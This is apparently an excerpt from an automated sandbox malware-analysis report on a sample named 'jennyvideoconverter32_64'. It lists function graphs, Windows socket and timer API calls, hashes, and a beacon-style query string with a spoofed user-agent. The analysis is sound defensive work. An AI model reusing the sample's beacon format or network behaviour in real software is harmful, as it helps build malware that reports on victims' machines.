2d83863 call 2d85119 call 2d83863 call 2d8aa28 call 2d8ab42 691->693 692->693 721 2d876ec-2d87717 Sleep call 2d91830 693->721 722 2d876e7 call 2d8380b 693->722 694->695 695->665 695->683 704 2d87a32-2d87a37 700->704 704->704 706 2d87a39-2d87a74 call 2d8a658 704->706 706->675 712 2d87a76-2d87ab0 call 2d8d04a 706->712 712->675 726 2d87719-2d87722 call 2d84100 721->726 727 2d87723-2d87731 721->727 722->721 726->727 727->677 729 2d87733 call 2d8380b 727->729 729->677
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02DB71B8), ref: 02D864BA
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D864D1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D864DA
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D864E9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D864EC
                                                                                • GetTickCount.KERNEL32 ref: 02D864F8
                                                                                • GetVersionExA.KERNEL32(02DB7010), ref: 02D86525
                                                                                • _memset.LIBCMT ref: 02D86544
                                                                                • _malloc.LIBCMT ref: 02D86551
                                                                                • _malloc.LIBCMT ref: 02D86561
                                                                                • _malloc.LIBCMT ref: 02D8656C
                                                                                • _malloc.LIBCMT ref: 02D86577
                                                                                • _malloc.LIBCMT ref: 02D86582
                                                                                • _malloc.LIBCMT ref: 02D8658D
                                                                                • _malloc.LIBCMT ref: 02D86598
                                                                                • _malloc.LIBCMT ref: 02D865A7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D865BE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865C7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865D6
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865D9
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865E4
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865E7
                                                                                • _memset.LIBCMT ref: 02D865FA
                                                                                • _memset.LIBCMT ref: 02D86606
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$Heap$AllocateProcess_memset$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 2445331799-2678694477
                                                                                • Opcode ID: 46da0763454c96c46ff045a1bcf48073a2c0e66b6f492149f64e5363561d3334
                                                                                • Instruction ID: 85850f25ad2572e8543b1e45c6b21945fbec41e7b33dec20a2e469b03fa8ae29
                                                                                • Opcode Fuzzy Hash: 46da0763454c96c46ff045a1bcf48073a2c0e66b6f492149f64e5363561d3334
                                                                                • Instruction Fuzzy Hash: 9C716172D44340AFE710AB709C49B6FBBE9EF85724F10481AF94597341DA749C01CFAA
                                                                                Function 02D81CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D11
                                                                                • GetLastError.KERNEL32 ref: 02D81D23
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D59
                                                                                • GetLastError.KERNEL32 ref: 02D81D6B
                                                                                • __beginthreadex.LIBCMT ref: 02D81DB1
                                                                                • GetLastError.KERNEL32 ref: 02D81DC6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D81DDD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D81DEC
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D81E14
                                                                                • CloseHandle.KERNELBASE(00000000), ref: 02D81E1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                • String ID: thread$thread.entry_event$thread.exit_event
                                                                                • API String ID: 831262434-3017686385
                                                                                • Opcode ID: 89ec5105a9233913a2d744f68ed19903000e99e54c772d09a781e4b5dc3cb444
                                                                                • Instruction ID: e4a62b35c72152dc3b8dc613eb6cefb7ac3c0630bebabe3df54902b3e7803050
                                                                                • Opcode Fuzzy Hash: 89ec5105a9233913a2d744f68ed19903000e99e54c772d09a781e4b5dc3cb444
                                                                                • Instruction Fuzzy Hash: 77312971A043019FE700EF24C849B2FBBA5FB84755F104969F9599B390EB70DD4ACBA2
                                                                                Function 02D84603 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 761 2d84603-2d8463b call 2da5330 call 2d90a50 call 2d93a8f 768 2d8463d-2d84645 call 2d8966a 761->768 769 2d84647 761->769 771 2d84649-2d8465c call 2d8a782 768->771 769->771 775 2d84661-2d84664 771->775 776 2d84683-2d84687 775->776 777 2d84666-2d84672 htons 775->777 780 2d84689-2d846db htonl * 2 htons call 2d83d7e call 2d8826e 776->780 781 2d846f1-2d847f8 call 2d81ba7 call 2d8de26 htons call 2d92358 call 2d87c57 call 2d87c31 * 2 call 2d888bf call 2d883e4 776->781 778 2d84678-2d84681 777->778 779 2d848ae-2d848c1 call 2d93a8f 777->779 778->775 778->776 789 2d848cd 779->789 790 2d848c3-2d848cb call 2d8966a 779->790 793 2d846e0-2d846e4 780->793 833 2d847fa-2d84805 781->833 834 2d84871-2d8487a 781->834 794 2d848cf-2d84917 call 2d8a782 call 2d83c67 call 2d83d7e call 2d8826e 789->794 790->794 793->779 797 2d846ea-2d846ec 793->797 814 2d84b38-2d84b43 794->814 815 2d8491d-2d8494a call 2d8a658 794->815 797->779 818 2d84b4a-2d84b53 814->818 819 2d84b45 call 2d8380b 814->819 815->814 829 2d84950-2d8495a 815->829 823 2d84b5a-2d84b76 call 2d888bf 818->823 824 2d84b55 call 2d8380b 818->824 819->818 824->823 830 2d84960-2d84977 call 2d882e4 829->830 831 2d84a07-2d84a09 829->831 846 2d84979-2d8499d htonl * 2 830->846 847 2d8499f-2d849b7 830->847 839 2d84a0a-2d84a33 call 2d8a658 831->839 838 2d84809-2d84813 833->838 836 2d8487c call 2d8143f 834->836 837 2d84881-2d848a5 call 2d888bf * 2 834->837 836->837 837->779 863 2d848a7-2d848a9 call 2d8143f 837->863 842 2d8486e 838->842 843 2d84815-2d84841 call 2d8826e 838->843 839->814 854 2d84a39-2d84a5e call 2d8a658 839->854 842->834 856 2d8486c 843->856 857 2d84843-2d84863 call 2d881e8 call 2d8843c 843->857 851 2d849ba-2d849e2 call 2d83bd3 htonl * 2 call 2d882e4 846->851 847->851 869 2d849e7-2d84a05 htons * 2 851->869 854->814 864 2d84a64-2d84a8d call 2d8a658 854->864 856->842 857->838 874 2d84865-2d8486a call 2d8143f 857->874 863->779 864->814 873 2d84a93-2d84b11 call 2d83863 * 2 call 2d8a7df call 2d8a87e call 2d84bad call 2d83863 * 2 call 2d844ab 864->873 869->839 892 2d84b16-2d84b2d call 2d91830 873->892 874->838 892->814 895 2d84b2f-2d84b37 call 2d84100 892->895 895->814
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84608
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                • htons.WS2_32(?), ref: 02D84669
                                                                                • htonl.WS2_32(?), ref: 02D8468C
                                                                                • htonl.WS2_32(00000000), ref: 02D84693
                                                                                • htons.WS2_32(00000000), ref: 02D84747
                                                                                • _sprintf.LIBCMT ref: 02D8475D
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                • htons.WS2_32(?), ref: 02D846B0
                                                                                  • Part of subcall function 02D8966A: __EH_prolog.LIBCMT ref: 02D8966F
                                                                                  • Part of subcall function 02D8966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D896EA
                                                                                  • Part of subcall function 02D8966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D89708
                                                                                  • Part of subcall function 02D81BA7: __EH_prolog.LIBCMT ref: 02D81BAC
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                                  • Part of subcall function 02D8DE26: __EH_prolog.LIBCMT ref: 02D8DE2B
                                                                                • htonl.WS2_32(?), ref: 02D8497C
                                                                                • htonl.WS2_32(00000000), ref: 02D84983
                                                                                • htonl.WS2_32(00000000), ref: 02D849C8
                                                                                • htonl.WS2_32(00000000), ref: 02D849CF
                                                                                • htons.WS2_32(?), ref: 02D849EF
                                                                                • htons.WS2_32(?), ref: 02D849F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                • String ID:
                                                                                • API String ID: 1645262487-0
                                                                                • Opcode ID: 2e73e0f1f4104f1fe5d832e0594e0849922b2007f3f0b97f2897d506e4554eff
                                                                                • Instruction ID: 04b7c2e0b433caf82dee1cee9258d57b09958db094b984a8864d1a12174e1aa4
                                                                                • Opcode Fuzzy Hash: 2e73e0f1f4104f1fe5d832e0594e0849922b2007f3f0b97f2897d506e4554eff
                                                                                • Instruction Fuzzy Hash: 5E022671D0125AEFEF15EBA4D844BEEBBB9EF08304F10415AE505A7280DB746E49CFA1
                                                                                Function 02D84D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 898 2d84d86-2d84dcb call 2da5330 call 2d90a50 RtlEnterCriticalSection RtlLeaveCriticalSection 903 2d84dd1 898->903 904 2d850d4-2d850dd 898->904 907 2d84dd6-2d84e00 call 2d83863 call 2d84bed 903->907 905 2d850df call 2d8380b 904->905 906 2d850e4-2d850f4 904->906 905->906 913 2d850a1-2d850ad RtlEnterCriticalSection RtlLeaveCriticalSection 907->913 914 2d84e06-2d84e0b 907->914 915 2d850b3-2d850ce RtlEnterCriticalSection RtlLeaveCriticalSection 913->915 916 2d8506e-2d85070 914->916 917 2d84e11-2d84e3a call 2d8ce0c 914->917 915->904 915->907 916->913 918 2d85072-2d8509f call 2d8a658 916->918 917->913 922 2d84e40-2d84e5c call 2d87c57 917->922 918->913 918->915 926 2d84e5e-2d84e7c call 2d8ce0c 922->926 927 2d84ec4-2d84ec8 922->927 931 2d84e81-2d84e87 926->931 929 2d84eca-2d84ef9 call 2d8ce0c 927->929 930 2d84e8d-2d84e99 RtlEnterCriticalSection RtlLeaveCriticalSection 927->930 929->930 937 2d84efb-2d84f2c call 2d8ce0c 929->937 932 2d84e9f-2d84ea6 RtlEnterCriticalSection RtlLeaveCriticalSection 930->932 931->930 934 2d84f98-2d84fc1 call 2d8ce0c 931->934 935 2d84eac-2d84ebf call 2d888bf 932->935 944 2d85064-2d85069 934->944 945 2d84fc7-2d84ff0 call 2d8ce0c 934->945 935->915 937->930 946 2d84f32-2d84f93 call 2d8cf3e call 2d888bf call 2d88634 call 2d888bf 937->946 944->932 945->944 950 2d84ff2-2d85028 call 2d87c31 call 2d8a8e5 call 2d8a9bd 945->950 946->934 962 2d8502d-2d85050 call 2d888bf call 2d91830 950->962 962->935 967 2d85056-2d8505f call 2d84100 962->967 967->935
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84D8B
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84DB7
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84DC3
                                                                                  • Part of subcall function 02D84BED: __EH_prolog.LIBCMT ref: 02D84BF2
                                                                                  • Part of subcall function 02D84BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D84CF2
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84E93
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84E99
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84EA0
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84EA6
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850A7
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850AD
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850B8
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2062355503-0
                                                                                • Opcode ID: ef4acb0c1b989154a110e8c05762e75fd95feabad3083966a6c8179cc6c4b59c
                                                                                • Instruction ID: 745a0222991d7458afbd0766c450a166fbb4863e752bf987357ae654e4aecc03
                                                                                • Opcode Fuzzy Hash: ef4acb0c1b989154a110e8c05762e75fd95feabad3083966a6c8179cc6c4b59c
                                                                                • Instruction Fuzzy Hash: B1B12871D0025EDFEF15EFA0D840BEEBBB5EF04314F24405AE805A6280DB745A49CFA2
                                                                                Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 996 401f64-401f84 FindResourceA 997 401f86-401f9d GetLastError SizeofResource 996->997 998 401f9f-401fa1 996->998 997->998 999 401fa6-401fec LoadResource LockResource GlobalAlloc call 402800 * 2 997->999 1000 402096-40209a 998->1000 1005 401fee-401ff9 999->1005 1005->1005 1006 401ffb-402003 GetTickCount 1005->1006 1007 402032-402038 1006->1007 1008 402005-402007 1006->1008 1009 402053-402083 GlobalAlloc call 401c26 1007->1009 1010 40203a-40204a 1007->1010 1008->1009 1011 402009-40200f 1008->1011 1018 402088-402093 1009->1018 1013 40204c 1010->1013 1014 40204e-402051 1010->1014 1011->1009 1012 402011-402023 1011->1012 1016 402025 1012->1016 1017 402027-40202a 1012->1017 1013->1014 1014->1009 1014->1010 1016->1017 1017->1012 1019 40202c-40202e 1017->1019 1018->1000 1019->1011 1020 402030 1019->1020 1020->1009
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                • GetLastError.KERNEL32 ref: 00401F86
                                                                                • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                • String ID:
                                                                                • API String ID: 564119183-0
                                                                                • Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                                • Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
                                                                                • Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                                • Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8
                                                                                Function 02D826DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1021 2d826db-2d82726 RtlEnterCriticalSection 1022 2d82728-2d82736 CreateWaitableTimerA 1021->1022 1023 2d8277e-2d82781 1021->1023 1026 2d82738-2d82756 GetLastError call 2d90a50 call 2d81712 1022->1026 1027 2d8275b-2d82778 SetWaitableTimer 1022->1027 1024 2d82783-2d82798 call 2d93a8f 1023->1024 1025 2d827d5-2d827f0 RtlLeaveCriticalSection 1023->1025 1032 2d827ca 1024->1032 1033 2d8279a-2d827ac call 2d93a8f 1024->1033 1026->1027 1027->1023 1036 2d827cc-2d827d0 call 2d87d36 1032->1036 1039 2d827b9 1033->1039 1040 2d827ae-2d827b7 1033->1040 1036->1025 1041 2d827bb-2d827c3 call 2d81cf8 1039->1041 1040->1041 1043 2d827c8 1041->1043 1043->1036
                                                                                APIs
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D82706
                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D8272B
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DA5A93), ref: 02D82738
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D82778
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D827D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID: timer
                                                                                • API String ID: 4293676635-1792073242
                                                                                • Opcode ID: c31d0d44902dd7e06b1a5f13d8808a11c3dd3f743987a2c1a620522ea3eace0e
                                                                                • Instruction ID: ebcef521a7c76ba6cc62be910e77403959ad0045178dd45f110fb0aed2af57e5
                                                                                • Opcode Fuzzy Hash: c31d0d44902dd7e06b1a5f13d8808a11c3dd3f743987a2c1a620522ea3eace0e
                                                                                • Instruction Fuzzy Hash: AC318DB1908741AFD310EF65D948B6ABBE8FB48725F104A2EF95582780D770EC14CFA5
                                                                                Function 02D82B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1072 2d82b95-2d82baf 1073 2d82bb1-2d82bb9 call 2d90a50 1072->1073 1074 2d82bc7-2d82bcb 1072->1074 1082 2d82bbf-2d82bc2 1073->1082 1076 2d82bcd-2d82bd0 1074->1076 1077 2d82bdf 1074->1077 1076->1077 1080 2d82bd2-2d82bdd call 2d90a50 1076->1080 1078 2d82be2-2d82c11 WSASetLastError WSARecv call 2d8a43c 1077->1078 1084 2d82c16-2d82c1d 1078->1084 1080->1082 1085 2d82d30 1082->1085 1087 2d82c2c-2d82c32 1084->1087 1088 2d82c1f-2d82c2a call 2d90a50 1084->1088 1089 2d82d32-2d82d38 1085->1089 1091 2d82c34-2d82c39 call 2d90a50 1087->1091 1092 2d82c46-2d82c48 1087->1092 1097 2d82c3f-2d82c42 1088->1097 1091->1097 1095 2d82c4a-2d82c4d 1092->1095 1096 2d82c4f-2d82c60 call 2d90a50 1092->1096 1099 2d82c66-2d82c69 1095->1099 1096->1089 1096->1099 1097->1092 1101 2d82c6b-2d82c6d 1099->1101 1102 2d82c73-2d82c76 1099->1102 1101->1102 1104 2d82d22-2d82d2d call 2d81996 1101->1104 1102->1085 1105 2d82c7c-2d82c9a call 2d90a50 call 2d8166f 1102->1105 1104->1085 1112 2d82cbc-2d82cfa WSASetLastError select call 2d8a43c 1105->1112 1113 2d82c9c-2d82cba call 2d90a50 call 2d8166f 1105->1113 1118 2d82d08 1112->1118 1119 2d82cfc-2d82d06 call 2d90a50 1112->1119 1113->1085 1113->1112 1122 2d82d0a-2d82d12 call 2d90a50 1118->1122 1123 2d82d15-2d82d17 1118->1123 1127 2d82d19-2d82d1d 1119->1127 1122->1123 1123->1085 1123->1127 1127->1078
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82BE4
                                                                                • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D82C07
                                                                                  • Part of subcall function 02D8A43C: WSAGetLastError.WS2_32(00000000,?,?,02D82A51), ref: 02D8A44A
                                                                                • WSASetLastError.WS2_32 ref: 02D82CD3
                                                                                • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D82CE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Recvselect
                                                                                • String ID: 3'
                                                                                • API String ID: 886190287-280543908
                                                                                • Opcode ID: 03e58b65a55d83a42ba299e335e73af4cf10637c02fce65b9a792bc4c2acfb72
                                                                                • Instruction ID: 33dbede86cdd2a283562b9e5caa7d2f3c35acab4cc94a0388b2271e9ba4d0f6a
                                                                                • Opcode Fuzzy Hash: 03e58b65a55d83a42ba299e335e73af4cf10637c02fce65b9a792bc4c2acfb72
                                                                                • Instruction Fuzzy Hash: 71415CB19093419FDB10AF64D408BABBBE9EF84755F10491EE8D987380EB70DD44CBA2
                                                                                Function 00402D60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 00402D86
                                                                                  • Part of subcall function 004039F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                  • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                                                • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                                  • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                • String ID: h6z
                                                                                • API String ID: 2057626494-2152286941
                                                                                • Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                                • Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
                                                                                • Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                                • Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59
                                                                                Function 02D829EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1208 2d829ee-2d82a06 1209 2d82a0c-2d82a10 1208->1209 1210 2d82ab3-2d82abb call 2d90a50 1208->1210 1212 2d82a39-2d82a4c WSASetLastError closesocket call 2d8a43c 1209->1212 1213 2d82a12-2d82a15 1209->1213 1217 2d82abe-2d82ac6 1210->1217 1218 2d82a51-2d82a55 1212->1218 1213->1212 1216 2d82a17-2d82a36 call 2d90a50 call 2d82f50 1213->1216 1216->1212 1218->1210 1221 2d82a57-2d82a5f call 2d90a50 1218->1221 1226 2d82a69-2d82a71 call 2d90a50 1221->1226 1227 2d82a61-2d82a67 1221->1227 1233 2d82aaf-2d82ab1 1226->1233 1234 2d82a73-2d82a79 1226->1234 1227->1226 1228 2d82a7b-2d82aad ioctlsocket WSASetLastError closesocket call 2d8a43c 1227->1228 1228->1233 1233->1210 1233->1217 1234->1228 1234->1233
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82A3B
                                                                                • closesocket.WS2_32 ref: 02D82A42
                                                                                • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D82A89
                                                                                • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D82A97
                                                                                • closesocket.WS2_32 ref: 02D82A9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                • String ID:
                                                                                • API String ID: 1561005644-0
                                                                                • Opcode ID: 8d2dbed8ee4db2688655a2e2802f0dd04617ff7af64a34b6983d340e64fa07d4
                                                                                • Instruction ID: 7b10040db507d7dadd8338a8fb1b737f03650cda146a32d31dc78d705b28ce25
                                                                                • Opcode Fuzzy Hash: 8d2dbed8ee4db2688655a2e2802f0dd04617ff7af64a34b6983d340e64fa07d4
                                                                                • Instruction Fuzzy Hash: 7E210371A04245ABEB20BBB8990CB6EB7E9EF44315F11496AEC05D3381EB70CD40CBA1
                                                                                Function 02D81BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D81BAC
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1633115879-0
                                                                                • Opcode ID: 6645dd131c514ee901b085a4b5945a1ad694a99dec670d416fb46ed20cfd2f4d
                                                                                • Instruction ID: e9ff18df7ae63c50a2aaac6b2419ea1a90e3f2e10084f00407040c71423ba734
                                                                                • Opcode Fuzzy Hash: 6645dd131c514ee901b085a4b5945a1ad694a99dec670d416fb46ed20cfd2f4d
                                                                                • Instruction Fuzzy Hash: CC218BB5A00214DFDB14DF68C444B9AFBB5FF49714F208589E85997301D774ED0ACBA0
                                                                                Function 02D82EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82EEE
                                                                                • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82EFD
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82F0C
                                                                                • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D82F36
                                                                                Memory Dump Source
